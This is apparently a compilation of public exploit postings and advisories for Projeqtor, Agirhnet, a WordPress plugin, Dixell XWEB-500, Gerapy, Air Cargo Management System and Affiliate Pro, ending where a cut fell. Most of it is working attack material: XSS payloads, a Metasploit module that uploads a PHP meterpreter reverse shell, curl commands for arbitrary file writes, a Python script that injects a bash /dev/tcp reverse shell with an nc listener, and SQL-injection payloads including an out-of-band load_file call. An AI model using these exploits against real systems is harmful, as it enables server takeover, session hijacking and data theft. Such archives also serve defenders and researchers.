<pre><code># Exploit Title: Projeqtor v9.3.1 Stored XSS / Privilege Escalation<br /># Exploit Author: Oscar Gutierrez (m4xp0w3r)<br /># Date: January 4, 2021<br /># Vendor Homepage: https://www.projeqtor.org/en/<br /># Software Link: https://www.projeqtor.org/en/product-en/downloads<br /># Tested on: Ubuntu, LAAMP<br /># Vendor: Projeqtor<br /># Version: v9.3.1<br /># Exploit Description:<br />Projeqtor version 9.3.1 suffers from a stored XSS vulnerability via SVG file upload. A low level user can upload svg images that contain malicious Javascript. In this way an attacker can escalate privileges and upload a malicious plugin which results in arbitrary code execution in the server hosting the application.<br /># Steps to reproduce:<br />Upload the following XML code as an SVG file and change the xlink for a location that you control. Once the administrator user opens the attachment, the Javascript code hosted by the attacker will execute.<br /><br /><?xml version="1.0" standalone="no"?><br /><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><br /><br /><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"><br /> <rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" /><br /> <script xlink:href="<script src=CHANGE THIS FOR THE LOCATION OF YOUR SCRIPT></script>"></script><br /></svg><br /></code></pre>
<pre><code># Exploit Title: [Agirhnet] - Reflected XSS via GET<br /># Google Dork: inurl:agirhnet<br /># Date: 2022-02-21<br /># Exploit Author: Daniel Martinez Adan (aDoN90)<br /># Vendor Homepage: https://agirh.net/<br /># Version: [app version] 1.0<br /># CVSS : 6.1 (AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)<br /><br />URL:<br />https://example.com/AgirhNet/LoadingProgress.aspx?FORM=/%22%0Aconfirm(document.domain)//<br /><br />vulnerable Parameter : FORM<br /><br /><br />Payload: /%22%0Aconfirm(document.domain)//<br /><br />it is compulsory to put the "/" at the beginning of the payload (it has to<br />recognize it as a URL)<br /><br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = NormalRanking<br /><br /> prepend Msf::Exploit::Remote::AutoCheck<br /> include Msf::Exploit::FileDropper<br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::Remote::HTTP::Wordpress<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Wordpress Plugin Catch Themes Demo Import RCE',<br /> 'Description' => %q{<br /> The Wordpress Plugin Catch Themes Demo Import versions < 1.8 are vulnerable to authenticated<br /> arbitrary file uploads via the import functionality found in the<br /> ~/inc/CatchThemesDemoImport.php file, due to insufficient file type validation.<br /> Re-exploitation may need a reboot of the server, or to wait an arbitrary timeout.<br /> During testing this timeout was roughly 5min.<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'h00die', # msf module<br /> 'Ron Jost', # edb<br /> 'Thinkland Security Team' # listed on wordfence's site<br /> ],<br /> 'References' => [<br /> [ 'EDB', '50580' ],<br /> [ 'CVE', '2021-39352' ],<br /> [ 'URL', 'https://plugins.trac.wordpress.org/changeset/2617555/catch-themes-demo-import/trunk/inc/CatchThemesDemoImport.php' ],<br /> [ 'URL', 'https://www.wordfence.com/vulnerability-advisories/#CVE-2021-39352' ],<br /> [ 'WPVDB', '781f2ff4-cb94-40d7-96cb-90128daed862' ]<br /> ],<br /> 'Platform' => ['php'],<br /> 'Privileged' => false,<br /> 'Arch' => ARCH_PHP,<br /> 'Targets' => [<br /> [ 'Automatic Target', {}]<br /> ],<br /> # we leave this out as typically php.ini will bail before 350mb, and payloads are small enough to fit as is.<br /> # 'Payload' =><br /> # {<br /> # # https://plugins.trac.wordpress.org/browser/catch-themes-demo-import/tags/1.6.1/inc/CatchThemesDemoImport.php#L226<br /> # 'Space' => 367_001_600, # 350mb<br /> # }<br /> 'DisclosureDate' => '2021-10-21',<br /> 'DefaultTarget' => 0,<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'php/meterpreter/reverse_tcp'<br /> },<br /> 'Notes' => {<br /> 'Stability' => [ CRASH_SAFE ],<br /> 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],<br /> # https://support.shufflehound.com/forums/topic/i-cant-use-the-one-click-demo-installer/#post-31770<br /> # re-exploitation may need a reboot of the server, or to wait an arbitrary timeout.<br /> 'Reliability' => [ UNRELIABLE_SESSION ]<br /> }<br /> )<br /> )<br /><br /> register_options [<br /> OptString.new('USERNAME', [true, 'Username of the account', 'admin']),<br /> OptString.new('PASSWORD', [true, 'Password of the account', 'admin']),<br /> OptString.new('TARGETURI', [true, 'The base path of the Wordpress server', '/']),<br /> ]<br /> end<br /><br /> def check<br /> return CheckCode::Safe('Wordpress not detected.') unless wordpress_and_online?<br /><br /> checkcode = check_plugin_version_from_readme('catch-themes-demo-import', '1.8')<br /> if checkcode == CheckCode::Safe<br /> print_error('catch-themes-demo-import not a vulnerable version')<br /> end<br /> checkcode<br /> end<br /><br /> def exploit<br /> cookie = wordpress_login(datastore['USERNAME'], datastore['PASSWORD'])<br /><br /> if cookie.nil?<br /> vprint_error('Invalid login, check credentials')<br /> return<br /> end<br /><br /> # grab the ajax_nonce<br /> res = send_request_cgi({<br /> 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'themes.php'),<br /> 'method' => 'GET',<br /> 'cookie' => cookie,<br /> 'keep_cookies' => 'false', # for some reason wordpress gives back an unauth cookie here, so ignore it.<br /> 'vars_get' => {<br /> 'page' => 'catch-themes-demo-import'<br /> }<br /> })<br /> fail_with(Failure::Unreachable, 'Site not responding') unless res<br /> fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200<br /> /"ajax_nonce":"(?<ajax_nonce>[a-z0-9]{10})"/ =~ res.body<br /> fail_with(Failure::UnexpectedReply, 'Unable to find ajax_nonce on page') unless ajax_nonce<br /> vprint_status("Ajax Nonce: #{ajax_nonce}")<br /><br /> random_filename = "#{rand_text_alphanumeric(6..12)}.php"<br /> vprint_status("Uploading payload filename: #{random_filename}")<br /><br /> multipart_form = Rex::MIME::Message.new<br /> multipart_form.add_part('ctdi_import_demo_data', nil, nil, 'form-data; name="action"')<br /> multipart_form.add_part(ajax_nonce, nil, nil, 'form-data; name="security"')<br /> multipart_form.add_part('undefined', nil, nil, 'form-data; name="selected"')<br /> multipart_form.add_part(<br /> payload.encoded,<br /> 'application/x-php',<br /> nil,<br /> "form-data; name=\"content_file\"; filename=\"#{random_filename}\""<br /> )<br /><br /> res = send_request_cgi(<br /> 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'admin-ajax.php'),<br /> 'method' => 'POST',<br /> 'cookie' => cookie,<br /> 'keep_cookies' => 'true',<br /> 'ctype' => "multipart/form-data; boundary=#{multipart_form.bound}",<br /> 'data' => multipart_form.to_s<br /> )<br /> fail_with(Failure::Unreachable, 'Site not responding') unless res<br /> fail_with(Failure::UnexpectedReply, 'Plugin not ready to process new payloads. Please retry in a few minutes.') if res.code == 200 && res.body.include?('afterAllImportAJAX')<br /> fail_with(Failure::UnexpectedReply, 'Failed to upload payload') unless res.code == 500<br /> # yes, a 500. We uploaded a malformed item, so when it tries to import it, it fails. This<br /> # is actually positive as it won't display a malformed item anywhere in the UI. Simply writes our payload, then exits (non-gracefully)<br /> #<br /> # [Fri Dec 24 16:48:00.904980 2021] [php7:error] [pid 440128] [client 192.168.2.199:38107] PHP Fatal error: Uncaught Error: Class 'XMLReader' not found in /var/www/wordpress/wp-content/plugins/catch-themes-demo-import/vendor/catchthemes/wp-content-importer-v2/src/WXRImporter.php:123<br /> # Stack trace:<br /> # #0 /var/www/wordpress/wp-content/plugins/catch-themes-demo-import/vendor/catchthemes/wp-content-importer-v2/src/WXRImporter.php(331): CatchThemes\\WPContentImporter2\\WXRImporter->get_reader()<br /> # #1 /var/www/wordpress/wp-content/plugins/catch-themes-demo-import/inc/Importer.php(80): CatchThemes\\WPContentImporter2\\WXRImporter->import()<br /> # #2 /var/www/wordpress/wp-content/plugins/catch-themes-demo-import/inc/Importer.php(137): CTDI\\Importer->import()<br /> # #3 /var/www/wordpress/wp-content/plugins/catch-themes-demo-import/inc/CatchThemesDemoImport.php(306): CTDI\\Importer->import_content()<br /> # #4 /var/www/wordpress/wp-includes/class-wp-hook.php(292): CTDI\\CatchThemesDemoImport->import_demo_data_ajax_callback()<br /> # #5 /var/www/wordpress/wp-includes/class-wp-hook.php(316): WP_Hook->apply_filters()<br /> # #6 /var/www/wordpress/wp-includes/plugin.php(484): WP_ in /var/www/wordpress/wp-content/plugins/catch-themes-demo-import/vendor/catchthemes/wp-content-importer-v2/src/WXRImporter.php on line 123<br /> register_file_for_cleanup(random_filename)<br /> month = Date.today.month.to_s.rjust(2, '0')<br /> print_status("Triggering payload at wp-content/uploads/#{Date.today.year}/#{month}/#{random_filename}")<br /> send_request_cgi(<br /> 'uri' => normalize_uri(target_uri.path, 'wp-content', 'uploads', Date.today.year, month, random_filename),<br /> 'method' => 'GET',<br /> 'keep_cookies' => 'true'<br /> )<br /> end<br />end<br /></code></pre>
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022<br />Original source: https://malvuln.com/advisory/1f84a5305b65d7f6aa3afa7e2f2bda0e.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.Agent.baol<br />Vulnerability: Insecure Permissions<br />Description: The malware writes several PE files with insecure permissions under c drive granting change (C) permissions to the authenticated user group. Standard users can rename the executable dropped by the malware to disable it or replace it with their own executable. Then wait for a privileged user to logon to the infected machine to potentially escalate privileges.<br />Type: PE32<br />MD5: 1f84a5305b65d7f6aa3afa7e2f2bda0e<br />Vuln ID: MVID-2022-0495<br />Disclosure: 02/21/2022<br /><br /><br />Exploit/PoC:<br />C:\>cacls NB_Server.exe<br />C:\NB_Server.exe BUILTIN\Administrators:(ID)F<br /> NT AUTHORITY\SYSTEM:(ID)F<br /> BUILTIN\Users:(ID)R<br /> NT AUTHORITY\Authenticated Users:(ID)C<br /><br /><br />C:\>dir NB_Server.exe<br /> Volume in drive C has no label.<br /><br /> Directory of C:\<br /><br />02/11/2022 02:10 AM 70,411 NB_Server.exe<br /> 1 File(s) 70,411 bytes<br /> 0 Dir(s) 26,507,804,672 bytes free<br /><br />C:\>cacls ds1.exe<br />C:\ds1.exe BUILTIN\Administrators:(ID)F<br /> NT AUTHORITY\SYSTEM:(ID)F<br /> BUILTIN\Users:(ID)R<br /> NT AUTHORITY\Authenticated Users:(ID)C<br /><br />C:\>dir ds1.exe<br /> Volume in drive C has no label.<br /><br /> Directory of C:\<br /><br />02/11/2022 02:10 AM 0 ds1.exe<br /> 1 File(s) 0 bytes<br /> 0 Dir(s) 26,506,407,936 bytes free<br /><br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code># Exploit Title: Dixell XWEB-500 - Arbitrary File Write<br /># Google Dork: inurl:"xweb500.cgi"<br /># Date: 03/01/2022<br /># Exploit Author: Roberto Palamaro<br /># Vendor Homepage: https://climate.emerson.com/it-it/shop/1/dixell-electronics-sku-xweb500-evo-it-it<br /># Version: XWEB-500<br /># Tested on: Dixell XWEB-500<br /># References: https://www.swascan.com/vulnerability-report-emerson-dixell-xweb-500-multiple-vulnerabilities/<br /><br /># Emerson Dixell XWEB-500 is affected by multiple Arbitrary File Write Vulnerability<br /><br /># Endpoint: logo_extra_upload.cgi<br /># Here the first line of the POC is the filename and the second one is the content of the file be written<br /># Write file<br />echo -e "file.extension\ncontent" | curl -A Chrome -kis "http://[target]:[port]/cgi-bin/logo_extra_upload.cgi" -X POST --data-binary @- -H 'Content-Type: application/octet-stream'<br /># Verify<br />curl -A Chrome -is "http://[target]:[port]/logo/"<br /><br /># Endpoint: lo_utils.cgi<br /># Here ACTION=5 is to enable write mode<br />echo -e "ACTION=5\nfile.extension\ncontent" | curl -A Chrome -kis "http://[target]:[port]/cgi-bin/lo_utils.cgi" -X POST --data-binary @- -H 'Content-Type: application/octet-stream' <br /># Verify using ACTION=3 to listing resources<br />echo -e "ACTION=3" | curl -A Chrome -kis "http://[target]:[port]/cgi-bin/lo_utils.cgi" -X POST --data-binary @- -H 'Content-Type: application/octet-stream'<br /><br /># Endpoint: cal_save.cgi<br /># Here the first line of the POC is the filename and the second one is the content of the file be written<br />echo -e "file.extension\ncontent" | curl -A Chrome -kis "http://[target]:[port]/cgi-bin/cal_save.cgi" -X POST --data-binary @- -H 'Content-Type: application/octet-stream'<br /># Verify<br />curl -A Chrome -kis http://[target]:[port]/cgi-bin/cal_dir.cgi<br /></code></pre>
<pre><code>On February 15, 2022, the Wordfence Threat Intelligence team responsibly disclosed a reflected Cross-Site Scripting (XSS) vulnerability in Header Footer Code Manager, a WordPress plugin with over 300,000 installations.<br /><br />The plugin publisher quickly acknowledged our initial contact and we sent the full disclosure details the same day, on February 15, 2022. A patched version, 1.1.17, was implemented a few days later and made available on February 18, 2022.<br /><br />Wordfence Premium, Wordfence Care, and Wordfence Response customers received a firewall rule to protect against this vulnerability on February 15, 2022. Sites still running the free version of Wordfence are partially protected against this exploit by our built-in XSS rule, but will receive full protection 30 days later, on March 17, 2022.<br /><br />Description: Reflected Cross-Site Scripting<br /><br />Affected Plugin: Header Footer Code Manager<br /><br />Plugin Slug: header-footer-code-manager<br /><br />Plugin Developer: 99robots<br /><br />Affected Versions: <= 1.1.16<br /><br />CVE ID: CVE-2022-0710<br /><br />CVSS Score: 6.1 (Medium)<br /><br />CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N<br /><br />Researcher/s: Ramuel Gall<br /><br />Fully Patched Version: 1.1.17<br /><br />Header Footer Code Manager is a WordPress plugin designed to allow administrators to add code snippets to the header or footer of a website. One of the admin panel pages added by the plugin allows administrators to view a list of code snippets that had been added to the site, which included links to edit or delete these existing code snippets. The plugin’s column_name function used the $_REQUEST[‘page’] parameter to construct this link.<br /><br />WordPress uses the value of the $_GET[‘page’] parameter in order to determine which page the user is currently visiting, and will block unauthorized users if they’re not allowed to access the current page set in $_GET[‘page’]. This means that $_REQUEST[‘page’] might be expected to just contain the admin page used to display the list of code snippets, hfcm-list. However, due to a quirk of how PHP handles superglobal variables, $_REQUEST parameters can be overloaded.<br /><br />PHP populates the $_REQUEST superglobal variable from $_GET, $_POST, and $_COOKIE. That means that normally, if a $_GET[‘page’] parameter is sent, $_REQUEST[‘page’] will be populated with the value of $_GET[‘page’]. In most PHP configurations, however, the request_order (or variables_order if request_order is not set) means that if a request is sent with both a $_GET[‘page’] parameter and a $_POST[‘page’] parameter, the value of $_REQUEST[‘page’] is set to the value of $_POST[‘page’].<br /><br />The upshot is that this can be used to execute JavaScript in the browser of a logged-in administrator, for instance, by tricking them into visiting a self-submitting form that sends a POST request to e.g. hxxps://victimsite.site/wp-admin/admin.php?page=hfcm-list, with the $_POST[‘page’] parameter set to malicious JavaScript.<br /><br />The $_GET[‘page’] parameter means that WordPress will route the victim to the correct page, and then the value of $_REQUEST[‘page’] (which in nearly all configurations will be set to the value of $_POST[‘page’]) will get echoed out onto the page.<br /><br />Most XSS can be used to perform actions using an administrator’s session, which includes the ability to create malicious administrators and in some cases add backdoors. Additionally, this particular plugin is used to add code to a site, so an attacker could also potentially leverage reflected XSS into stored XSS to attack site visitors, even on sites where file editing and user creation functionality was locked down.<br /><br />Timeline<br /><br />February 15, 2022 - The Wordfence Threat Intelligence team finishes our investigation and releases a firewall rule to Wordfence Premium, Care, and Response users to protect against any exploits targeting this vulnerability. We initiate the responsible disclosure process and receive a response from the plugin’s developers. We send over full disclosure.<br /><br />February 17, 2022 - Plugin changelog shows the issue is fixed.<br /><br />February 18, 2022 - A patched version of the plugin, 1.1.17, is released on the WordPress repo.<br /><br />March 17, 2022 - The firewall rule becomes available to free Wordfence users.<br /><br />Conclusion<br /><br />In today’s article, we discussed a reflected XSS vulnerability in Header Footer Code Manager. While this would require tricking an administrator into clicking a link or performing some other action, it still offers the potential for site takeover. As such we urge you to update to the latest version of this plugin, 1.1.17 as of this writing, as soon as possible.<br /><br /></code></pre>
<pre><code># Exploit Title: Gerapy 0.9.7 - Remote Code Execution (RCE) (Authenticated)<br /># Date: 03/01/2022<br /># Exploit Author: Jeremiasz Pluta<br /># Vendor Homepage: https://github.com/Gerapy/Gerapy<br /># Version: All versions of Gerapy prior to 0.9.8<br /># CVE: CVE-2021-43857<br /># Tested on: Gerapy 0.9.6<br /><br /># Vulnerability: Gerapy prior to version 0.9.8 is vulnerable to remote code execution. This issue is patched in version 0.9.8.<br /><br />#!/usr/bin/python<br />import sys<br />import re<br />import argparse<br />import pyfiglet<br />import requests<br />import time<br />import json<br />import subprocess<br /><br />banner = pyfiglet.figlet_format("CVE-2021-43857")<br />print(banner)<br />print('Exploit for CVE-2021-43857')<br />print('For: Gerapy < 0.9.8')<br /><br />login = "admin" #CHANGE ME IF NEEDED<br />password = "admin" #CHANGE ME IF NEEDED<br /><br />class Exploit:<br /><br /> def __init__(self, target_ip, target_port, localhost, localport):<br /> self.target_ip = target_ip<br /> self.target_port = target_port<br /> self.localhost = localhost<br /> self.localport = localport<br /><br /> def exploitation(self):<br /> payload = """{"spider":"`/bin/bash -c 'bash -i >& /dev/tcp/""" + localhost + """/""" + localport + """ 0>&1'`"}"""<br /><br /> #Login to the app (getting auth token)<br /> url = "http://" + target_ip + ":" + target_port<br /> r = requests.Session()<br /> print("[*] Resolving URL...")<br /> r1 = r.get(url)<br /> time.sleep(3)<br /> print("[*] Logging in to application...")<br /> r2 = r.post(url + "/api/user/auth", json={"username":login,"password":password}, allow_redirects=True)<br /> time.sleep(3)<br /> if (r2.status_code == 200):<br /> print('[*] Login successful! Proceeding...')<br /> else:<br /> print('[*] Something went wrong!')<br /> quit()<br /><br /> #Create a header out of auth token (yep, it's bad as it looks)<br /> dict = json.loads(r2.text)<br /> temp_token = 'Token '<br /> temp_token2 = json.dumps(dict['token']).strip('"')<br /> auth_token = {}<br /> auth_token['Authorization'] = temp_token + temp_token2<br /><br /> #Get the project list<br /> print("[*] Getting the project list")<br /> r3 = r.get(url + "/api/project/index", headers=auth_token, allow_redirects=True)<br /> time.sleep(3)<br /><br /> if (r3.status_code != 200):<br /> print("[!] Something went wrong! Maybe the token is corrupted?")<br /> quit();<br /><br /> #Parse the project name for a request (yep, it's worse than earlier)<br /> dict = r3.text # [{'name': 'test'}]<br /> dict2 = json.dumps(dict)<br /> dict3 = json.loads(dict2)<br /> dict3 = json.loads(dict3)<br /> name = dict3[0]['name']<br /> print("[*] Found project: " + name)<br /><br /> #use the id to check the project<br /> print("[*] Getting the ID of the project to build the URL")<br /> r4 = r.get(url + "/api/project/" + name + "/build", headers=auth_token, allow_redirects=True)<br /> time.sleep(3)<br /> if (r4.status_code != 200):<br /> print("[*] Something went wrong! I can't reach the found project!")<br /> quit();<br /><br /> #format the json to dict<br /> dict = r4.text<br /> dict2 = json.dumps(dict)<br /> dict3 = json.loads(dict2)<br /> dict3 = json.loads(dict3)<br /> id = dict3['id']<br /> print("[*] Found ID of the project: ", id)<br /> time.sleep(1)<br /><br /> #netcat listener<br /> print("[*] Setting up a netcat listener")<br /> listener = subprocess.Popen(["nc", "-nvlp", self.localport])<br /> time.sleep(3)<br /><br /> #exec the payload<br /> print("[*] Executing reverse shell payload")<br /> print("[*] Watchout for shell! :)")<br /> r5 = r.post(url + "/api/project/" + str(id) + "/parse", data=payload, headers=auth_token, allow_redirects=True)<br /> listener.wait()<br /><br /> if (r5.status_code == 200):<br /> print("[*] It worked!")<br /> listener.wait()<br /> else:<br /> print("[!] Something went wrong!")<br /> listener.terminate()<br /><br />def get_args():<br /> parser = argparse.ArgumentParser(description='Gerapy < 0.9.8 - Remote Code Execution (RCE) (Authenticated)')<br /> parser.add_argument('-t', '--target', dest="url", required=True, action='store', help='Target IP')<br /> parser.add_argument('-p', '--port', dest="target_port", required=True, action='store', help='Target port')<br /> parser.add_argument('-L', '--lh', dest="localhost", required=True, action='store', help='Listening IP')<br /> parser.add_argument('-P', '--lp', dest="localport", required=True, action='store', help='Listening port')<br /> args = parser.parse_args()<br /> return args<br /><br />args = get_args()<br />target_ip = args.url<br />target_port = args.target_port<br />localhost = args.localhost<br />localport = args.localport<br /><br />exp = Exploit(target_ip, target_port, localhost, localport)<br />exp.exploitation()<br /> <br /><br /></code></pre>
<pre><code>## Title: Air Cargo Management System v1.0 remote SQL-Injections<br />## Author: nu11secur1ty<br />## Date: 02.18.2022<br />## Vendor: https://www.sourcecodester.com/users/tips23<br />## Software: https://www.sourcecodester.com/php/15188/air-cargo-management-system-php-oop-free-source-code.html<br />## CVE - Air Cargo Management Systemv1.0<br /><br /><br />## Description:<br />The `ref_code` parameter from Air Cargo Management System v1.0 appears<br />to be vulnerable to SQL injection attacks.<br />The payload '+(select<br />load_file('\\\\c5idmpdvfkqycmiqwv299ljz1q7jvej5mtdg44t.https://www.sourcecodester.com/php/15188/air-cargo-management-system-php-oop-free-source-code.html\\hag'))+'<br />was submitted in the ref_code parameter.<br />This payload injects a SQL sub-query that calls MySQL's load_file<br />function with a UNC file path that references a URL on an external<br />domain.<br />The application interacted with that domain, indicating that the<br />injected SQL query was executed.<br />WARNING: If this is in some external domain, or some subdomain<br />redirection, or internal whatever, this will be extremely dangerous!<br />Status: CRITICAL<br /><br /><br />[+] Payloads:<br /><br />```mysql<br />---<br />Parameter: ref_code (GET)<br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: p=trace&ref_code=258044'+(select<br />load_file('\\\\c5idmpdvfkqycmiqwv299ljz1q7jvej5mtdg44t.https://www.sourcecodester.com/php/15188/air-cargo-management-system-php-oop-free-source-code.html\\hag'))+''<br />AND (SELECT 9012 FROM (SELECT(SLEEP(3)))xEdD) AND 'JVki'='JVki<br />---<br /><br />```<br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/blob/main/vendors/oretnom23/2022/Air-Cargo-Management-System)<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/ekn92z)<br /><br /></code></pre>
<pre><code>Document Title:<br />===============<br />Affiliate Pro v1.7 - Multiple Cross Site Vulnerabilities<br /><br /><br />References (Source):<br />====================<br />https://www.vulnerability-lab.com/get_content.php?id=2281<br /><br /><br />Release Date:<br />=============<br />2022-01-05<br /><br /><br />Vulnerability Laboratory ID (VL-ID):<br />====================================<br />2281<br /><br /><br />Common Vulnerability Scoring System:<br />====================================<br />5.1<br /><br /><br />Vulnerability Class:<br />====================<br />Cross Site Scripting - Non Persistent<br /><br /><br />Current Estimated Price:<br />========================<br />500€ - 1.000€<br /><br /><br />Product & Service Introduction:<br />===============================<br />Affiliate Pro is a Powerful and yet simple to use PHP affiliate Management System for your new or existing website. Let affiliates<br />sell your products, bring you traffic or even leads and reward them with a commission. More importantly, use Affiliate Pro to track<br />it intelligently to keep your affiliates happy and also your bottom line! So how does it work? It is pretty simple, when a user visits<br />your website through an affiliate URL the responsible affiliate sending the traffic to you will receive a commission based on your settings.<br /><br />(Copy of the Homepage:https://jdwebdesigner.com/ &https://codecanyon.net/item/affiliate-pro-affiliate-management-system/12908496 )<br /><br /><br />Abstract Advisory Information:<br />==============================<br />The vulnerability laboratory core research team discovered multiple reflected cross site scripting web vulnerabilities in the Affiliate Pro - Affiliate Management System v1.7.<br /><br /><br />Affected Product(s):<br />====================<br />jdwebdesigner<br />Product: Affiliate Pro v1.7 - Affiliate Management System (PHP) (Web-Application)<br /><br /><br />Vulnerability Disclosure Timeline:<br />==================================<br />2021-08-22: Researcher Notification & Coordination (Security Researcher)<br />2021-08-23: Vendor Notification (Security Department)<br />2021-08-30: Vendor Response/Feedback (Security Department)<br />2021-**-**: Vendor Fix/Patch (Service Developer Team)<br />2021-**-**: Security Acknowledgements (Security Department)<br />2022-01-05: Public Disclosure (Vulnerability Laboratory)<br /><br /><br />Discovery Status:<br />=================<br />Published<br /><br /><br />Exploitation Technique:<br />=======================<br />Remote<br /><br /><br />Severity Level:<br />===============<br />Medium<br /><br /><br />Authentication Type:<br />====================<br />Restricted Authentication (Guest Privileges)<br /><br /><br />User Interaction:<br />=================<br />Low User Interaction<br /><br /><br />Disclosure Type:<br />================<br />Responsible Disclosure<br /><br /><br />Technical Details & Description:<br />================================<br />Multiple reflected cross site scripting web vulnerabilities has been discovered in the Affiliate Pro - Affiliate Management System v1.7.<br />The vulnerability allows remote attackers to inject own malicious script codes with non-persistent attack vector to compromise client-site<br />browser to web-application requests.<br /><br />The non-persistent cross site scripting web vulnerabilities are located in the `email`,`username` and `fullname` parameters of the `index` module.<br />Attackers are able to inject own malicious script code to the `Fullname`,`Username` or `Email` input fields to manipulate client-side requests.<br />The request method to inject is post and the attack vector is non-persistent (reflected) on client-side. The injection- and execution points are<br />located in the index formular for affiliates to enter.<br /><br />Successful exploitation of the vulnerabilities results in session hijacking, non-persistent phishing attacks, non-persistent external redirects to<br />malicious source and non-persistent manipulation of affected application modules.<br /><br />Request Method(s):<br />[+] POST<br /><br />Vulnerable Module(s):<br />[+] index<br /><br />Vulnerable Input(s):<br />[+] Email<br />[+] Username<br />[+] Fullname<br /><br />Vulnerable Parameter(s):<br />[+] email<br />[+] username<br />[+] fullname<br /><br /><br />Proof of Concept (PoC):<br />=======================<br />The client-side cross site scripting web vulnerability can be exploited by remote attackers without account and with low or medium user interaction.<br />For security demonstration or to reproduce the cross site scripting web vulnerability follow the provided information and steps below to continue.<br /><br /><br />Exploitation: Payload<br /><iframe src="javascript:alert(1337)"></iframe><br />%3cscript%3ealert(1337)%3c%2fscript%3<br /><br /><br />--- PoC Session Logs (POST) ---<br />POST /affiliate-pro-demo/index HTTP/1.1<br />Host: affiliates-pro.localhost:8000<br />Origin:http://affiliates-pro.localhost:8000<br />Cookie: session_id=92b8a43b5bdf5d1c54999bfbcf702f24<br />Referer:http://affiliates-pro.localhost:8000/affiliate-pro-demo/<br />Content-Type: application/x-www-form-urlencoded<br />Accept-Encoding: gzip, deflate<br />Accept: */*<br />-<br />fullname=<iframe src="javascript:alert(1337)"></iframe><br />&username=<iframe src="javascript:alert(1337)"></iframe>@pwnd.coml00fp%22%3e%3cscript%3ealert(1337)%3c%2fscript%3ewkgzv<br />&p=test&confirmpwd=j2B%21p5o%21K8<br />-<br />HTTP/1.1 200 OK<br />Server: Apache<br />Set-Cookie: session_id=92b8a43b5bdf5d1c54999bfbcf702f24; path=/; HttpOnly<br />Connection: Upgrade, close<br />Vary: Accept-Encoding<br />Content-Length: 6549<br />Content-Type: text/html; charset=UTF-8<br /><br /><br />Vulnerable Source: Index<br /><div class="control-group"><br /><label class="control-label" for="fullname">Full Name</label><br /><div class="controls"><br /><input id="textinput" name="fullname" type="text" placeholder="Full Name" class="input-xlarge" value="<iframe src="javascript:alert(1337)"></iframe>" required="required"><br /></div><br /></div><br /><div class="control-group"><br /><label class="control-label" for="username">Username</label><br /><div class="controls"><br /><input id="textinput" name="username" type="text" placeholder="username" class="input-xlarge" value="<iframe src="javascript:alert(1337)"></iframe>" required><br /></div><br /></div><br /><div class="control-group"><br /><label class="control-label" for="email">E-Mail Address</label><br /><div class="controls"><br /><input id="textinput" name="email" type="email" placeholder="test@provider.com" class="input-xlarge" value="<iframe src="javascript:alert(1337)"></iframe>" required><br /></div><br /><br /><br />Security Risk:<br />==============<br />The security risk of the client-side cross site scripting vulnerabilities in the web-application are estimated as medium.<br /><br /><br />Credits & Authors:<br />==================<br />Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab<br /><br /><br />Disclaimer & Information:<br />=========================<br />The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,<br />either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab<br />or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits<br />or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do<br />not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.<br />We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.<br /><br />Domains:www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com<br />Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com<br />Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab<br />Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php vulnerability-lab.com/rss/rss_news.php<br />Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php<br /><br />Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.<br />Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other<br />media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other<br />information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, 